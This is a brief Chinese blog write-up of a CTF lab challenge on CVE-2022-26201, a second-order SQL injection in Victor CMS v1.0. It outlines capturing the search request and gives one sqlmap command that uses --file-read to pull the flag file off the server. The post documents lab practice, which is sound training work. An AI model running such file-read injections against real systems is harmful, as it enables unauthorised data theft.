[春秋云镜]CVE-2022-26201 | Victor CMS v1.0 存在二次注入漏洞

靶标介绍:

Victor CMS v1.0 存在二次注入漏洞

搜索,抓包

 

 

 sqlmap跑注入点

python311 sqlmap.py -r G:/1.txt --file-read "/flag" --dbms mysql --batch

 

 得出文件

 查看文件

 

posted @ 2023-11-22 13:10  木头魂  阅读(461)  评论(0)    收藏  举报